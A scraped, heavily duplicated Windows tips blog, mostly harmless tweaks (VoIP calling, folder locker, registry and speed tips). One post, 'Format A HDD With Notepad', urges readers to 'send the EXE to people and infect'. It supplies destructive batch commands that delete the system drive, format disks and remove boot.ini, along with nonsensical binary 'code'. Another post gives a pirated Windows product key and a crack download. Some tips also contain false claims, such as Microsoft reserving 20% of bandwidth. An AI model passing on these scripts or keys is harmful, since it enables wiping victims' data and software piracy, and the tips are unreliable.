Free Calling to Any US Phone From Your iPhone
This method REQUIRES a WiFi connection and jailbroken iPhone!!!
Thanks goes to Unique311 at internettablettalk for first showing me how to do this on the Nokia N800/N810 Internet Tablets. I’m sure others came before him on the PC method. What’s new is it now works on the iPhone.
You need 3 accounts:
1) grandcentral at www.grandcentral.com (Edit: This should be your first check – they look to be closed for new users)
2) gizmo at www.gizmoproject.com
3) Fring on your iPhone (www.fring.com)
Watch gigafied’s video to get started:
You need to a flashplayer enabled browser to view this YouTube video
You don’t need to install Gizmo if you’re using just the iPhone. But free calling from the PC will require the softphone of Gizmo.
The extra step Unique311 shows is adding the gizmo number to each contact in grandcentral. For the iPhone, watch up to 1:32. By the way, you have to enter contacts that you want to call on your iPhone in grandcentral on your PC, and unfortunately that’s still a manual process. Here’s Unique311’s video:
You need to a flashplayer enabled browser to view this YouTube video
Now…install Fring. Instructions here:
http://www.fring.com/iphone/
Once you get Fring installed
Open Fring.
Tap “Communitiesâ€
Tap SIP
Enter your Gizmo username and password
Enter Proxy as: proxy01.sipphone.com
I then tap on the “Dialerâ€
Leave that open (Don’t “Exit”) and click the “Home†button to go back to the Springboard.
Open Safari.
Go to www.grandcentral.com/mobile
Log in.
Click “Contacts.â€
Click a contact.
Click the word “call†next to the phone number. Fring will pop up and ask you to Accept or Decline. Click Accept and your free call is placed. (If you accidentally click the phone number, a black/gray screen pops up with the number and you can Cancel or Call. Cancel this. This is placing your call over the cell/mobile providers network = not free.)
It sounds complicated, but once you get setup and grandcentral bookmarked – it only takes a few seconds to make a call.
Fring is Beta, but it worked well on my one-hour free call from Berlin, Germany to Minnesota last night.
Cheers.
PS: Use the Gizmo softphone (just leave it open when calling from grandcentral) for free PC calls and similar VOIP phones on Windows Mobile and the Nokia Internet Tablets.
Friday, March 12, 2010
Format A HDD With Notepad
If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Folder Lock Without Any Software
-: Folder Lock Without Any Software :-
Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
How to use symbols like Trade Mark™
Press and hold the "Alt" key
then type 0153
For example:Trade Mark™(Alt+0153)
then type 0153
For example:Trade Mark™(Alt+0153)
Top Ten Tips To Improve System Speed
Top Ten Tips To Improve System Speed
1.Let your PC boot up completely before opening any applications.
2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6.Delete the temporary internet files regularly.
7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.
RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!
1.Let your PC boot up completely before opening any applications.
2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6.Delete the temporary internet files regularly.
7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.
RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!
Renaming USB Drive Labels in Linux
Renaming USB Drive Labels in Linux
There, you got all the inspirations from the web and your friends and have now Linux proudly running on your system. (Linux is the kernel, ya ya I know you got it). Your friend approaches you to help him get rid of the virus in his USB drive. And you are proud you are of help in terminating viruses with ease, thanks to Linux’s security. And he asks you to do a favour. To rename the USB drive label to his name, from the name “disk”.
You try to rename it from the terminal, but it fails. (Yes, command mv doesn’t work here.)
You open /media, right click on the USB Drive folder and go to Properties. But you find no option there either to change the drive Label! (Am talking with respect to Ubuntu. It’s great if other distros have it).
Did your new Linux system fail you? In Windows, you can rename Labels of USB’s just by visiting its Properties. Can’t Linux do even this simple thing!
Let me assure you that, you can, but in a slightly round about way.
From Terminal
You will be using the mlabel command.
1. First type the mount command to find out the device location of you pen drive. Find the line which goes like “/dev/sdc1 on /media/disk …”.
2. This means the device sdc1 which is my pen drive is mounted on /media/disk.
3. Next unmount the device.
sudo unmount /media/disk
4. Next use this command.
sudo mlabel -i /dev/sdc1 ::
If you get a message like:
Total number of sectors (7831520) not a multiple of sectors per track (63)!
You can easily ignore the check by running this command:
echo mtools_skip_check=1 >> ~/.mtoolsrc
Try again and it should work.
5. The name of the USB should have changed. Unplug and Plug the pen drive back in and it will be mounted with the new label name.
The GUI way
1. For this you need the Gparted software. Install it if you don’t have it already.
2. Open the software as a super user, and select the pen drive from GParted>Devices>
3. Unmount the device if it hasn’t been, by right clicking on it.
4. After unmounting, right click on it and select “Label” and change it to whatever you want it to be. And then Apply it, by clicking the Edit>Apply All Operations.
5. Your pendrives label should be changed now.
Yes, it is a pretty around the way method. But unfortunately, nautilus doesn’t currently support partition renaming. Hope it’s there in Karmic Koala!
There, you got all the inspirations from the web and your friends and have now Linux proudly running on your system. (Linux is the kernel, ya ya I know you got it). Your friend approaches you to help him get rid of the virus in his USB drive. And you are proud you are of help in terminating viruses with ease, thanks to Linux’s security. And he asks you to do a favour. To rename the USB drive label to his name, from the name “disk”.
You try to rename it from the terminal, but it fails. (Yes, command mv doesn’t work here.)
You open /media, right click on the USB Drive folder and go to Properties. But you find no option there either to change the drive Label! (Am talking with respect to Ubuntu. It’s great if other distros have it).
Did your new Linux system fail you? In Windows, you can rename Labels of USB’s just by visiting its Properties. Can’t Linux do even this simple thing!
Let me assure you that, you can, but in a slightly round about way.
From Terminal
You will be using the mlabel command.
1. First type the mount command to find out the device location of you pen drive. Find the line which goes like “/dev/sdc1 on /media/disk …”.
2. This means the device sdc1 which is my pen drive is mounted on /media/disk.
3. Next unmount the device.
sudo unmount /media/disk
4. Next use this command.
sudo mlabel -i /dev/sdc1 ::
If you get a message like:
Total number of sectors (7831520) not a multiple of sectors per track (63)!
You can easily ignore the check by running this command:
echo mtools_skip_check=1 >> ~/.mtoolsrc
Try again and it should work.
5. The name of the USB should have changed. Unplug and Plug the pen drive back in and it will be mounted with the new label name.
The GUI way
1. For this you need the Gparted software. Install it if you don’t have it already.
2. Open the software as a super user, and select the pen drive from GParted>Devices>
3. Unmount the device if it hasn’t been, by right clicking on it.
4. After unmounting, right click on it and select “Label” and change it to whatever you want it to be. And then Apply it, by clicking the Edit>Apply All Operations.
5. Your pendrives label should be changed now.
Yes, it is a pretty around the way method. But unfortunately, nautilus doesn’t currently support partition renaming. Hope it’s there in Karmic Koala!
One Click Shutdown
Creating Shutdown Icon or One Click Shutdown:
Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in “Type Location of the Item”
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace “C” with the correct letter of the hard drive. Click the “Next” button. Name the shortcut and click the “Finish” button. Now whenever you want to shut down, just click on this shortcut and you’re done.
Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in “Type Location of the Item”
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace “C” with the correct letter of the hard drive. Click the “Next” button. Name the shortcut and click the “Finish” button. Now whenever you want to shut down, just click on this shortcut and you’re done.
MULTIPLE YAHOO MESSENGER LOGIN
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart computer and try Multiple Login
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart computer and try Multiple Login
MULTIPLE YAHOO MESSENGER LOGIN
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart computer and try Multiple Login
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart computer and try Multiple Login
remove recycle bin from your desktop
How to remove recycle bin from your desktop Tip:
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
Speed Up Browsing
--------------------------------Speed Up Browsing-------------------
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper .etc ...
I have a Motorola V220 and want to have my own ringtones without down load from internet and PAID angry2.gif . After searching all night for "how to" ...this is what I got - after testing with my mobile...and it works very well. I want to share with you ...
A - Tools
1- You have to have a mobile phone which has USB connection (of course yu.gif )
2- a USB cable (whatever cable that can connect PC to your mobile, mine is a digital camera USB cable)
Softwares
1- MobilePhoneTools_1.23c
2- MobilePhoneTools_2.21b (updated)
3- p2k_driver_2.3 (for modem driver update)
4- USB_driver (just in case)
B - SETUP
1- Unzip and install MobilePhoneTools_1.23c
2- Update with MobilePhone_2.21b
3- Unzip p2k_driver into a folder
4- Connect your phone to PC
5. Windows will automatically detect the new hardware and open the "Welcome to the Found New Hardware Wizard"
6. Click "Install from a list or specific location (Advanced)", then click next.
7. On the next window, only choose "Include this location in the search", then click "Browse"
8. In the "Browse for folder" window, click on the folder you unzip "p2k_driver", then click "OK", then "Next"
9. Windows will search for the driver in that folder, and it is there ....BUT.....
10. A window pops up:
"The software you are installing for this hardware:
Motorola USB Modem
has not passed Windows Logo testing to verify its compatibility with Windows XP. (Tell me why this is important.{XP says this, I am not asking it})
Continuing your installation of this software may impair or destabilize the correct operation of your system either immediately or in the future. Microsoft strongly recommends that you stop this installation now and contact the hardware wendor for software that has passed Windows Logo testing."
Click "Continue Anyway"
11. After the wizard finds the driver, click "Finish"
C - Copy MIDI, WAV, MP3, PICTURES ...to mobile
After setup you can copy any your favours Midi, MP3, Wav etc ..to your mobile as your own Ringtones, wallpapers cheer.gif
D - Down load SOFTWARES here
MobilePhoneTools_1.23c_EN (18MB)
CODE
http://www.free.cz/motorola/Motorola_MobilePhoneTools_1.23c_EN.zip
MobilePhoneTools_2.21b_US (21MB)
CODE
http://www.free.cz/motorola/mobilePhoneTools_2.21b_US.exe
p2k_driver (43kb)
CODE
http://www.free.cz/motorola/P2K_driver_2.3.zip
USB_driver (1.2MB)
CODE
http://www.free.cz/motorola/Motorola_USB_Modem_Driver.zip
E - Some useful websites
CODE
How to make your own ringtones
http://www.asahi-net.or.jp/~HB9T-KTD/music/English/Research/Ringtone/create.html
http://www.engadget.com/entry/1498517852773617/
http://www.mrbass.org/ringtones/
http://www.ringtoneripper.com/
AND ..this is the site for you that Ringtones are made ready for you to d/l FREE :beer:
http://powerlink.no/sound/
FORUM to discuss and ask questions
http://www.howardforums.com/forumdisplay.php?s=&forumid=38
I have a Motorola V220 and want to have my own ringtones without down load from internet and PAID angry2.gif . After searching all night for "how to" ...this is what I got - after testing with my mobile...and it works very well. I want to share with you ...
A - Tools
1- You have to have a mobile phone which has USB connection (of course yu.gif )
2- a USB cable (whatever cable that can connect PC to your mobile, mine is a digital camera USB cable)
Softwares
1- MobilePhoneTools_1.23c
2- MobilePhoneTools_2.21b (updated)
3- p2k_driver_2.3 (for modem driver update)
4- USB_driver (just in case)
B - SETUP
1- Unzip and install MobilePhoneTools_1.23c
2- Update with MobilePhone_2.21b
3- Unzip p2k_driver into a folder
4- Connect your phone to PC
5. Windows will automatically detect the new hardware and open the "Welcome to the Found New Hardware Wizard"
6. Click "Install from a list or specific location (Advanced)", then click next.
7. On the next window, only choose "Include this location in the search", then click "Browse"
8. In the "Browse for folder" window, click on the folder you unzip "p2k_driver", then click "OK", then "Next"
9. Windows will search for the driver in that folder, and it is there ....BUT.....
10. A window pops up:
"The software you are installing for this hardware:
Motorola USB Modem
has not passed Windows Logo testing to verify its compatibility with Windows XP. (Tell me why this is important.{XP says this, I am not asking it})
Continuing your installation of this software may impair or destabilize the correct operation of your system either immediately or in the future. Microsoft strongly recommends that you stop this installation now and contact the hardware wendor for software that has passed Windows Logo testing."
Click "Continue Anyway"
11. After the wizard finds the driver, click "Finish"
C - Copy MIDI, WAV, MP3, PICTURES ...to mobile
After setup you can copy any your favours Midi, MP3, Wav etc ..to your mobile as your own Ringtones, wallpapers cheer.gif
D - Down load SOFTWARES here
MobilePhoneTools_1.23c_EN (18MB)
CODE
http://www.free.cz/motorola/Motorola_MobilePhoneTools_1.23c_EN.zip
MobilePhoneTools_2.21b_US (21MB)
CODE
http://www.free.cz/motorola/mobilePhoneTools_2.21b_US.exe
p2k_driver (43kb)
CODE
http://www.free.cz/motorola/P2K_driver_2.3.zip
USB_driver (1.2MB)
CODE
http://www.free.cz/motorola/Motorola_USB_Modem_Driver.zip
E - Some useful websites
CODE
How to make your own ringtones
http://www.asahi-net.or.jp/~HB9T-KTD/music/English/Research/Ringtone/create.html
http://www.engadget.com/entry/1498517852773617/
http://www.mrbass.org/ringtones/
http://www.ringtoneripper.com/
AND ..this is the site for you that Ringtones are made ready for you to d/l FREE :beer:
http://powerlink.no/sound/
FORUM to discuss and ask questions
http://www.howardforums.com/forumdisplay.php?s=&forumid=38
To change Hard disk to another computer
Preparing to Move Hard Drive to Another Computer
To remove the devices from device manager when taking a HD from one computer to another,simply:
Run Regedit
Go to HKEY_LOCAL_MACHINE\ and delete the Enum section
This removes all of the hardware specific settings
To remove the devices from device manager when taking a HD from one computer to another,simply:
Run Regedit
Go to HKEY_LOCAL_MACHINE\ and delete the Enum section
This removes all of the hardware specific settings
Speed up internet by 20%
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc
You can get it back:
Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy
then Computer Configuration
then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.
You can get it back:
Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy
then Computer Configuration
then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.
Enable.Disable Registry Editing tools
-------------------Enable/Disable Registry Editing tools-------------
Copy the following code,paste in any notepad and save as "regtools.vbs" file. Just double click it and you will get yor regedit enabled.(Be careful to copy the code exactly as presented here including everything.
Code goes here.......
'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99
Option Explicit
'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
Copy the following code,paste in any notepad and save as "regtools.vbs" file. Just double click it and you will get yor regedit enabled.(Be careful to copy the code exactly as presented here including everything.
Code goes here.......
'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99
Option Explicit
'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
HOW TOUse GMail offline with Google Gears
Gmail has introduced its latest Labs feature called offline Gmail to enable e-mail access even when you are not connected to the Internet.
While this might sound uber geeky, the concept is simple enough when you actually use it. Oh, and the “offline” mode is already available in a simpler form if you happen to use Outlook or any other email client with Gmail POP access.
Gmail uses its Google Gears open source web application to enable the “offline” mode. Currently, Google lists Firefox 2, 3, and the Internet Explorer 7 in its list of supported browsers. Strangely, there is no mention of Google’s own, the Chrome! However, it might be because Chrome support is obvious.
Browse Gmail offline with Google Gears
Browse Gmail offline with Google Gears
What it does
The feature, which needs to be enabled from under the “Labs” option under “Settings,” downloads e-mails onto your computer and allows access even when there is no Internet connectivity. Users will be able to access most of their emails, reply to them, and view starred and unread messages, just like they do when Gmail is online. When you perform an action that needs web access, Gmail will queue the action and will execute it as soon the connection is restored. While it might not sound very exciting initially, I, for once, can realize how useful this might turn out to be. For many users, Gmail has become a data center, and I suspect that there are many people out there who would want to have a look at their mails and archives even when not connected to the Internet. The best thing is that once this feature is installed, Gmail will be able to go offline or online by detecting the network status, so you do not need to switch on/off the Offline mode manually. There is also this “Flaky Connection Mode” that detects a slow connection and uses the local cache for accessing data, and only uses the server when Gmail needs web access – like when hitting the send button.
Not all Gmail features work, though, in the offline mode. What does work, however, are the sending and replying to emails, searching your archives, and the much-needed auto-complete function. You will not be able to add attachments or add/manage contacts. However, most users will be able to live with such minor inconveniences.
Issues
As expected of a Labs feature, this application has been tested internally amongst 20,000 Google employees and has then been made available to the Labs. Not all users may see this enabled in their accounts, but the feature should be available to all in the coming days. As for the issues noticed, I have not seen anything go wrong in the little time that I have used this. However, CNET does report issues of the local cache going out of sync, but most issues can be sorted out by disabling and re-enabling the feature.
Related posts:
1. How to use Google gears to access GMail offline
2. Add Your Location Automatically to Your Gmail Signature
3. Google introduces Video Chat in GMail
4. Google launches their new browser “Google Chrome”
5. Invisible mode in Gmail
While this might sound uber geeky, the concept is simple enough when you actually use it. Oh, and the “offline” mode is already available in a simpler form if you happen to use Outlook or any other email client with Gmail POP access.
Gmail uses its Google Gears open source web application to enable the “offline” mode. Currently, Google lists Firefox 2, 3, and the Internet Explorer 7 in its list of supported browsers. Strangely, there is no mention of Google’s own, the Chrome! However, it might be because Chrome support is obvious.
Browse Gmail offline with Google Gears
Browse Gmail offline with Google Gears
What it does
The feature, which needs to be enabled from under the “Labs” option under “Settings,” downloads e-mails onto your computer and allows access even when there is no Internet connectivity. Users will be able to access most of their emails, reply to them, and view starred and unread messages, just like they do when Gmail is online. When you perform an action that needs web access, Gmail will queue the action and will execute it as soon the connection is restored. While it might not sound very exciting initially, I, for once, can realize how useful this might turn out to be. For many users, Gmail has become a data center, and I suspect that there are many people out there who would want to have a look at their mails and archives even when not connected to the Internet. The best thing is that once this feature is installed, Gmail will be able to go offline or online by detecting the network status, so you do not need to switch on/off the Offline mode manually. There is also this “Flaky Connection Mode” that detects a slow connection and uses the local cache for accessing data, and only uses the server when Gmail needs web access – like when hitting the send button.
Not all Gmail features work, though, in the offline mode. What does work, however, are the sending and replying to emails, searching your archives, and the much-needed auto-complete function. You will not be able to add attachments or add/manage contacts. However, most users will be able to live with such minor inconveniences.
Issues
As expected of a Labs feature, this application has been tested internally amongst 20,000 Google employees and has then been made available to the Labs. Not all users may see this enabled in their accounts, but the feature should be available to all in the coming days. As for the issues noticed, I have not seen anything go wrong in the little time that I have used this. However, CNET does report issues of the local cache going out of sync, but most issues can be sorted out by disabling and re-enabling the feature.
Related posts:
1. How to use Google gears to access GMail offline
2. Add Your Location Automatically to Your Gmail Signature
3. Google introduces Video Chat in GMail
4. Google launches their new browser “Google Chrome”
5. Invisible mode in Gmail
Make XP Genuine
There are a number of ways to make your windows genuine...
Once you have made your windows Genuine it have a lot of advantages...Like you can install :
Internet Explorer 7
Windows Media Player 11
Windows Defender
And Much more...
Method 1 :
Download This File or This
after that each time you want to update or install a new upgrade you just have to run this file to make your windows genuine...
If you restart your computer you have ti run this registry file again...
Method 2 :
Download jellybean keyfinder from here
rapidshare.com/files/22706111/keyfinder.zip
Now open keyfinder.exe
Click on options and click "change windows key"
Now enter this key and you're done.
*****************************
V2C47-MK7JD-3R89F-D2KXW-VPK3J
*****************************
Method 3 :
Download these Cracks :
